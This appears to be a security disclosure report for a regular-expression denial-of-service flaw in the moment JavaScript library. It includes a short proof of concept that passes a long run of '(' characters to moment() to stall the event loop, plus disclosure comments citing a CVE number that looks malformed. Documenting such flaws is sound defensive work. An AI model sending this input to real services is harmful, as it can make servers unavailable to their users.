Regular Expression Denial of Service (ReDoS) in moment/moment
Reported on
Jun 6th 2022
Description
Affected versions of the package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks for any string input controlled by the user.
An attacker can provide a specially crafted input to the default function moment()
, which nearly matches the pattern being matched. This will cause the regular expression matching to take a long time, all the while occupying the event loop and preventing it from processing other requests and making the server unavailable (a Denial of Service attack).
Proof of Concept
// PoC.js
moment=require('moment')
moment("(".repeat(50000)) // local execution time ~=0m1.6s
moment("(".repeat(500000)) // local execution time ~=8m49.741s
Expected behavior
Execution time has to be linear, not polynomial.
Impact
Any dependent pass user-controllable string inputs to package moment() could cause the denial of service attack. It happens in the default use of the package and potentially affects around 57,775 dependents (last access: June 7 2022).
Occurrences
SECURITY.md
a year ago
Hey @Iskren (@maintainer), The fixed version has already been released. Could we fully disclose this report too?
Hi @admin, the vulnerability has been assigned CVE-31129. Could you help to change the CVE ID status of this report?